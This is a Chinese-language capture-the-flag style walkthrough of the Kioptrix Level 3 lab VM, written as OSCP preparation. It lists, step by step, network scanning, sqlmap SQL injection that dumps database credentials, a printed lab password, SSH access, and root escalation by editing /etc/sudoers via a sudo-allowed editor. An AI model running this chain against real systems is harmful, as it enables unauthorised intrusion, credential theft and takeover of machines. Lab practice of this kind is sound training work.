OSCP备战-kioptrixvm3详细解法

small_white_robot2025-05-12 14:32

探测IP

复制代码 
arp-scan -l

得出目标IP:192.168.155.165

也可以使用

复制代码 
netdiscover -i eth0 -r 192.168.155.0/24

也可以使用

复制代码 
nmap -sN 192.168.155.0/24 --min-rate 1000

修改hosts文件

找到IP后,通过之前读取README.txt了解到,我们需要编辑hosts文件,将其指向kioptrix3.com

输入命令:

复制代码 
sudo nano /etc/hosts

添加一行如图所示:

复制代码 
192.168.155.165 kioptrix3.com

按下ctrl+x保存退出

端口扫描

复制代码 
nmap -sV -sT --min-rate 1000 -p1-65535 IP

结果:

Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-08 08:49 EDT

Nmap scan report for 192.168.155.165

Host is up (0.0050s latency).

Not shown: 65533 closed tcp ports (conn-refused)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)

80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with

80端口

访问一下

拿dirsearch 扫一下看看

复制代码 
dirsearch -u http://192.168.155.165 -e *

访问一下试试:

192.168.155.165/phpmyadmin/index.php

尝试无密码登录:admin

进入后台

no privileges提示我们没有权限,显示即为一个虚拟数据库

尝试爆破了一下,没出结果

回到主页,能点的都点一下

博客给了一个网页http://kioptrix3.com/gallery,和主页点击now跳转网页是一样的

点击login又是一个登录框

最开始我们就改了hosts文件,访问一下http://kioptrix3.com站点

如图:

明显跟之前的页面不一样,在那dirsearch扫一下

复制代码 
dirsearch -u http://kioptrix3.com/gallery -e *

访问得到:

Gallarific 2.1 - Free Version released October 10, 2009

搜一下searchsploit Gallarific

有一个注入漏洞的

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch

数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --dbs

现在连接的数据库:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-db

DBMS用户:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch --current-user

发现是root用户

表:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery --tables

字段:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users --columns

值:

复制代码 
sqlmap -u  http://kioptrix3.com/gallery/gallery.php?id=1 -p id --batch -D gallery -T gallarific_users -C "username,password" --dump

得到登录结果:
admin/n0t7t1k4

如此尝试,发现在dev_accounts中,得到了两组用户名和密码

尝试进行连接,只有后两组密码可以连接

复制代码 
ssh -oHostKeyAlgorithms=+ssh-rs- [email protected]

查看查看:

复制代码 
cat /etc/passwd

列出当前用户家目录下的所有文件和文件夹:

复制代码 
ls -al

读取文件:

复制代码 
cat CompanyPolicy.README

查看权限:

复制代码 
sudo -l

根据提示执行:

复制代码 
sudo /usr/local/bin/ht

报错

执行命令:

复制代码 
echo $TERM
export TERM=xterm
echo $TERM

重新执行

复制代码 
sudo /usr/local/bin/ht


按住F3,输入/etc/sudoers

回车.当用户执行sudo命令时,系统会到/etc/sudoers文件中寻找相关信息来判断该用户是否具有执行sudo的权限,所以我们修改sudoers文件,试用户loneferret具有使用sudo执行/bin/bash的权限,以达到提权的目的。

修改配置添加一行

复制代码 
loneferret ALL=(ALL) ALL

F2保存,ctral+c退出

执行命令

复制代码 
sudo /bin/bash

成功

相关推荐
黑客笔记1 小时前
网络安全的学习路线是怎么样的?
大数据·web安全
karatttt1 小时前
用go从零构建写一个RPC(4)--gonet网络框架重构+聚集发包
网络·分布式·rpc·架构·golang
C墨羽2 小时前
服务器间文件传输
运维·服务器·网络
hao_wujing9 小时前
使用逆强化学习对网络攻击者的行为偏好进行建模
开发语言·网络·php
lulinhao11 小时前
VLAN的作用和原理
网络·笔记·vlan
独行soc11 小时前
2025年渗透测试面试题总结-匿名[校招]高级安全工程师(代码审计安全评估)(题目+回答)
linux·安全·web安全·面试·职场和发展·渗透测试
20242817李臻11 小时前
李臻20242817_安全文件传输系统项目报告_第14周
数据库·安全
DevSecOps选型指南11 小时前
最佳实践|互联网行业软件供应链安全建设的SCA纵深实践方案
安全·开源·devsecops·软件供应链安全厂商·软件供应链安全工具
Mac技巧大咖11 小时前
恶意软件清理工具,让Mac电脑安全更简单
安全·macos·恶意软件清理工具
小蜜蜂嗡嗡11 小时前
flutter项目迁移空安全
javascript·安全·flutter
热门推荐
01KGG转MP3工具|非KGM文件|解密音频02YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04【SpeedAI科研小助手】2分钟极速解决知网维普重复率、AIGC率过高,一键全文降!文件格式不变,公式都保留的!05DeepSeek各版本说明与优缺点分析06组基轨迹建模 GBTM的介绍与实现(Stata 或 R)07YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU08【2025年最新】OpenWrt 更换国内源的指南(图形界面版)09VMware虚拟机安装Win7专业版保姆级教程(附镜像包)10模糊PID控制算法实战讲解-案例温度控制(附C语言实现)